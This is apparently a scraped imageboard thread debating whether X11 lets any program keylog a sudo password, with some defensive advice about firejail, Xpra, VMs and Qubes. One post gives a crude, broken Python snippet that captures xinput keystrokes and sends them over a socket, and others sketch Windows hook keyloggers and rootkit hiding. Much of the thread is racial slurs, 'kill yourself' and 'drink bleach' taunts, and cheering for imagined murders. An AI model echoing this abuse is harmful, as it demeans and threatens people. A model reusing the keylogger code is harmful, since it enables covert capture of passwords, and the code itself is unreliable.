I've been using linux for about 7 years now and I've seen no mention that entering your password in a sudo prompt in a terminal emulator is bad practice. (Although I started in Ubuntu, so they might just be cucks) From what I'm seeing, it would be easy for anyone that has access at my user level to quickly get root access and install rootkits and shit.
Welcome to the shitshow that is X11 Enjoy your stay
Leo Gray
Linux, not even once
Jayden Adams
>implying it's not just as trivial to set a global keyboard input hook and intercept keystrokes on Windows
Matthew Morris
UNIX like systems aren't designed to be secure, what did you expect? Every retard can write a simple keylogger for linux, Python example: import socket import subprocess
host = '' port = 1025 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((host, port)) s.listen(1) conn, addr = s.accept() proc = subprocess.Popen(['xinput'], shell=True, stdout= subprocess.Pipe, stderr = subprocess.Pipe) conn.send(proc.stdout.read()) i = conn.recv(1024) proc = subprocess.Popen(['xinput test'+i+' > .log']) # some shit when to send .log file x = open('.log', 'r').read() x.close() conn.send(x)
Christian Bennett
OP here, So what should I do? Just Ctrl-Alt-F2 and run all my root stuff in a real terminal, is that even secure?
Evan Rogers
If there's only me and root,why should I care? Am I missing something? It's not as though I'd keylog myself after all.
Christian Baker
Any program could keylog and upload it to a remote server, the bandwidth wouldn't be high enough to notice since it's just key codes. If you're running Google Chrome or some kind of shitty propietary software then you would be easy to hack I happen to run a fair number of games on wine, myself
Ayden Peterson
this It is built into the OS, not even botnet meme
it is just a bit of code around SetWindowsHookEx()
Jaxon Martin
Remote server was the wrong thing. I mean that the keylogger could sniff the root password from su or sudo and then use it to do whatever the fuck it wants. Maybe replace ps so that it doesn't show up on the process list and then just lodge itself as far in your anus as it can without you noticing.
Robert Jenkins
I tried writing a windoze keylogger using that once, it worked but murdered performance for some reason. Just having an "empty" global keyboard hook made the entire system slow down noticeably, I mean everything, like explorer.exe was being slowly but powerfully fucked in the ass by all the legs of a giant tarantula
-1/10 wouldn't try and keylog again
David Scott
once someone who isn't a low-tech has superuser rights on your machine you are basically fucked, because kernel modules are now pretty easy to install, no need to replace ps, manipulations on kernel level are pretty much undetectable
Carter Allen
yeah Global hooks are SLOW its better to do a per application hook and maybe have a list of common programs but the point was it very easy to do keyloggers in windows as well. but I am not defending X11 at all, this shit is retarded
Ryder Watson
>article written by a girl
Jeremiah Gomez
> not knowing who this is she probably has more knowledge of technology than you will ever have, fucking tard, search for Qubes OS and blue pill rootkit you pleb
Levi Long
>Qubes OS >homepage plastered with quotes from nobodies and muh privacy advocates dropped
>blue pill >named blue pill >"it's 100% undetectable" >refuses to let researchers try and detect it >refuses to even enter competition without $384,000 "funding" opinion discarded
Lincoln Reed
either this is blatant bait or you're legitimately retarded it's a shame that with neo-Sup Forums I can no longer tell which one it is
Cameron Howard
This is one reason why I run my web browser in a VM (with no shared clipboard).
Jason Long
It looks like qemu and xen have made some progress on passing a graphics card into the VM, so I might put all my games in that. Hopefully that doesn't make an even bigger security risk
Brandon Ortiz
Just don't use untrustworthy software, problem solved.
Joseph Price
If it's a dedicated graphics card for the VM you should be okay. I only have one graphics card so I disable 3D graphics and 2D acceleration for the VM to stop it reading GPU ram outside the VM.
Jonathan Phillips
Pretty much all software is untrustworthy when it's getting input from the internet. How much software do you use that's formally proven correct? Isolation is an important part of defense in depth. Better a single app gets owned than your whole system.
Chase Myers
Just use an EFF certified distro and never install any propietary software on it. Compile everything on it from source, including the compiler. Just compile the compiler by hand using asembly code and while you're at it double check that there are no binary blobs in any of the packages that you're compiling. Also use open source hardware so that the bios chips have no binary blobs. I was actually expecting that reply before I made the thread.
Brayden Rivera
>EFF certified distro
Levi Roberts
I guarantee you are using software with exploitable bugs right now. Access to the source is necessary but not sufficient for trustworthy software.
Charles Bennett
everyone of us is you nigger
Dominic Rodriguez
>shitting on Joanna lmao what a loser
Jaxon Carter
Web browser attack surface is too large for your claim to believable, even with major features like Javascript disabled (which is a common sense precaution).
Hudson Martinez
>Chromium, open source but hasn't been fully audited; had a binary blob snuck into the code randomly without distro devs noticing >OpenSSL, open source and audited but Heartbleed still happened anyway >Bash, shellshock vulnerability was in the code for 25 years before being noticed Point taken.
Charles Parker
Pls roll library girl
Jonathan Williams
Dammit
Leo Hall
roll
Noah Collins
>website stuck in infinite loop unless cookies are allowed Literally a botnet. Please don't ever post that shit here again.
Hunter Nelson
rolling for a cute waifu
Xavier Bell
fuck this shit. i'm killing my self right now.
Nolan Sanchez
...
Andrew Barnes
>Didn't even notice >Disables cookies to test for myself >Loops like you said >Comes back to reply >Sup Forums loses its shit because cookies are disabled
Thanks, Internet
Jonathan Lewis
>>blue pill >>named blue pill >>"it's 100% undetectable" >>refuses to let researchers try and detect it >>refuses to even enter competition without $384,000 "funding" >t-this is bait >please sleep with me, I defended your honor White knights should kill themselves.
Gavin Torres
>conveniently leaving out the fact that it was later open sourced drink bleach
Jacob Walker
>gets flak from everyone who isn't a pathetic white knight >>I'll open source it now Kill yourself.
Bentley Lewis
>still no proper argument against the security model of Qubes i want summerfags to leave
Evan Ramirez
yeah after she gave up trying to milk it for money
Matthew Evans
>Unzips popcorn
Juan Wood
>security model of Qubes The model is fine. The fact that it's based of Linux isn't. Security in Linux is a fucking joke, and GRSec makes it only slightly less shitty. You only get the unstable version of it, and even if you use the stable version the devs are such massive dumb fucks that they'll ban you if you point out any bugs in it.
Michael Young
>Security in Linux is a fucking joke butthurt windoze fagcunt detected
Brandon King
Windows security is better than Linux' these days. Sorry if your ass gets blasted. The only reason why Windows exploits are a big deal is because there are more people using it than 1 smelly, disgusting neckbeard.
Isaiah Stewart
As opposed to what, Win/Mac?
The *BSDs are usually pretty good at being secure OOTB, but they suffer from the exact same Xorg isolation issues as Linux in a desktop environment, plus it's fucking BSD. A hardened Linux distribution using grsec and SELinux (NSA botnet) is about the best security you'll be able to get, short of using Qubes.
>hur durdurdur Theo even says Linux is dogshit compared to Windows. OpenBSD is the ONLY unix-like OS that actually forces good security settings. Windows is getting better, but Linux is still fucking garbage because it's written for usability and performance first. >A hardened Linux distribution using grsec GRSec is shit. The fucking devs throw tantrums when people point out bugs involving a fucking unsigned check for less than fucking zero. Have fun getting the stable patches by the way, I hope you're a giant corporation with tens of thousands to throw at it.
Brody Parker
That's doesn't solve the problem with Unix and all Unix look-alikes: Security isn't in their design, is a add-on made with duct tape.
Connor Torres
>Amazing Grace isn't in that picture
Michael Thomas
>Theo says so Theo says a lot of things. Citing him without actually citing him doesn't count, and frankly makes you look dumb.
Mason Smith
you're severely misguided if you actually believe Windows is improving security-wise. At least on Linux, I have the luxury of e.g. disabling ptrace using SELinux. Good luck doing the same thing with OpenProcess() on Windows.
Anthony Reyes
>source: my arse How cute, believing in the security of linux… Where the developers actively try to suppress info about new bugs… Where you can say that a group of sane developers is a "bunch of masturbating monkeys" and saving your arse, and also, being celebrated by your own incompetence.
Andrew Harris
please not blue hair
Grayson Perry
>complains about lack of source >doesn't cite sources in his dubious bait-like reply Look boys, we caught ourselves yet another retard.
Ian Williams
>doesn't cite sources It's common fucking knowledge about Linus' stance on security.
Also can you get any more butthurt over one of Torvald's remarks? As if fucking Theo, of all people, hasn't made dickish remarks about Linux.
Justin Ward
>As if fucking Theo, of all people, hasn't made dickish remarks about Linux. Because Linus doesn't take security seriously and Linux' security is a fucking joke.
Connor Rivera
>asked to cite sources >"it's common knowledge guys xD"
A bunch of 12 year olds whining about papa torvalds' temper doesn't count as a source, dick-skin.
See, you're not citing what you know you should be citing, i.e. your bullshit bait. None of these sources prove any of your arguments thus far.
tl;dr you can't debate for shit and you're a failure, no wonder your mother hates you
Zachary Allen
taking quotes out of context: >"one reason I refuse to bother with the whole security circus is that I think it glorifies—and thus encourages—the wrong behavior. It makes 'heroes' out of security people, as if the people who don't just fix normal bugs aren't as important. In fact, all the boring normal bugs are way more important, just because there's a lot more of them."
wew lad
Jayden Morgan
>debate This isn't even a debate. This is you shilling for Linux' security, which is fucking garbage. Whatever lets you sleep at night I guess.
John Morris
>shilling >whatis English comprehension I haven't actually said a word in its favour, I'm just poking you with a stick because it's funny. Stay mad.
Jeremiah Morris
>A bunch of 12 year olds whining about papa torvalds' temper doesn't count as a source, dick-skin. You didn't read the mail list right? They explain in there what caused that Linus sprouted that shit out of this mouth. Linus can say anything he wants, but we cannot permit that he gets congratulated to saving his ass, specially in matters so sensible as security.
Owen Wright
>This isn't even a debate. It is and you haven't managed to provide a reasoning to back up your claims.
>"This is you shilling for Linux' security, which is fucking garbage." >Attacking the person instead of addressing the topic.
>Whatever lets you sleep at night I guess. Ok, but at least you didn't convince me of anything.
Oliver Robinson
I read enough of it to know that not a single person in that thread had any idea what they were talking about. You know, like you.
By carefully analysing your misuse of the English language, I have ascertained to with a 98.999999% probability that you are pic related.
David Murphy
>I read enough of it to know that not a single person in that thread had any idea what they were talking about. You know, like you. Okey, I'll accept that you're ass blasted enough to refuse to read the complete mail thread.
By carefully analysing your misuse of the English language, I have ascertained to with a 98.999999% probability that you are pic related. >careful analysis >he can't distinguish the gramatical errors between Pedros and Pajeets :^)
Adam Martinez
>thinks there's any difference between nigger flavours
Easton Taylor
How does a nigger taste?
Owen Harris
Like salted garbage
Zachary Bennett
>he knows the flavor of the garbage
Tyler Sanders
There is a reason selinux does not let users without the sysadmin role su or sudo
I have never used sudo, either way. I just su.
Jack Long
Windows works the same way you dumbfuck
Elijah Allen
you can do x11 isolation with xpra and firejail (firejail allows you to select additional permissions and to prevent x11 socket mappings, basically all you need to do is set your firejail config right, then add a symlink to firejail named the same as the program you want to invoke in your PATH). It will work as long as your program doesn't need internet access, otherwise you can't block out the socket mapping (for the time being) but you can otherwise prevent input leakage.
that cant intercept password uac prompt in windows.
Michael Ward
Yes.
The problem here isn't Linux but the X Window manager.
Sebastian Jackson
4u
Evan Anderson
su would have the exact same problem, the keys are being logged at the X11 level, so by the time the keypress has gotten to the terminal it's too late.
See
Nathan Ortiz
I see
Christian Clark
Pls be qt3.14
Jace Bell
rollan
Caleb Adams
I talked about every UNIX like system being unsecure you nigger, this also includes windows, the example won't work on windows as long as bash is not installed
Blake Johnson
Got Joanna
Christopher Butler
I saw a mention of firejail on the installgentoo wiki just before I made this thread, I guess I'll have to actually read that now
I was thinking that I could just install qubes at this point; or since qubes doesn't support VGA passthrough but xen and qemu apparently do (experimentally, at least), I could make a ghetto qubes setup with a bunch of virtual machines. I've got like 10TB of hard drives anyway, so redundant filesystems wouldn't be an issue for space.
Assuming that I can hold each VM in a file (eg. .vmdk) instead of giving them direct hard drive access
Bentley Kelly
>The sandbox replaces the regular X11 server with Xpra or Xephyr server. This prevents X11 keyboard loggers and screenshot utilities from accessing the main X11 server. >firejail.wordpress.com/documentation-2/x11-guide/
looks like that would work
Daniel Moore
Daily Reminder.
Hunter Richardson
Qubes is extremely buggy. For example, try putting a usb and mounting it on a vm, then removing the usb. The vm manager will crash. Now in the vm in which you mounted the usb, unmount is with umount. The vm will crash.
Start afresh, and this time umount in the vm before pulling the USB out. Press "unmount" in the device menu of the vm manager menu. The vm manager will crash and so will the vm.
When trying to start vm's, they fail to start with no stated reason about 2/10 times (others report up to 50% failure rate).
Moreover, the whole thing runs on fedora garbage, and it and systemd have already caused them many problems (you can google it).
Overall, it's a very unprofessional project in my experience, despite the good intentions.
Luis Butler
Was anybody really expecting anything different? It was thrown together by people jumping on the muh security bandwagon, for people jumping on the muh security bandwagon.
It's all Snowden's fault. The day the news mentions in passing that he's been murdered or suffered a horrific "accident" is the day I stand and salute my TV.
Lucas Cox
How does Wayland fair against this stuff?
Henry Robinson
>It's all the NSA's fault. The day the news mentions in passing that the head of the NSA's been murdered or suffered a horrific "accident" is the day I stand and salute my TV. fixed You're complaining because everyone is paranoid, why not fix it at the source?
